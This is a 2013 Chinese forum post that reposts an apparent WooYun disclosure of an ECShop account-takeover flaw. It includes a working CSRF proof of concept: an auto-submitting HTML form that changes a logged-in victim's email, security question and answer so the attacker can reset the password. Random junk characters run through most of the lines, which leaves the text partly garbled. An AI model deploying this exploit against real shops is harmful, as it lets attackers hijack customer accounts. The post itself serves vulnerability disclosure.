找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1952|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:8 \& H' ?- V$ M' G( P1 t8 r# m' H
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现5 }+ L1 O2 ^8 n6 p

! |% Q4 V' a9 R: b5 jDemo For:http://www.wooyun.org/bug.php?action=view&id=395! z0 C1 S( O" z, m# j8 [

" k5 ?5 A  [, v) }9 w详细说明:7 _* e! p, }4 g  D7 Y
利用csrf和xss可以突破官方所说的“障碍”
' J+ h3 [, Z  g0 lxss版本已经有人说明
  m% |/ b7 \/ w0 S1 Z( I这里给出csrf版本
" ^: Q3 ~; g1 G/ F5 @$ K: L- i/ E) `4 J6 s2 Y
漏洞证明:
$ }( G$ S0 X3 t" _9 ~4 }0 w- ?: m<html>% n- o$ J! u4 g. `
<body>! \$ s/ i/ m( ?* g5 e
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">7 ^  v9 m6 }/ y) y! P- b9 W9 X
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">- \7 i9 R. Q$ v: b/ {
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
& E& e! G. Z+ r0 n* |5 I) s' U<INPUT TYPE="text" NAME="sel_question" value="ecshop">
; f" m0 i; D6 p* p& ^9 a<INPUT TYPE="text" NAME="passwd_answer" value="exploit">( Y6 s9 A5 d, S
</body>
9 I9 `. L2 w2 C' ~. k; w* T<script>
1 y1 R/ Z2 P* z' kdocument.forms[0].submit();
5 T  g; E/ P% f; i" M</script>& `5 h2 m9 t3 [5 x8 [
</html>! h3 U% |- a+ }
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失) L: h. ~/ y# ~

  m( m" Y% H. f! c
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表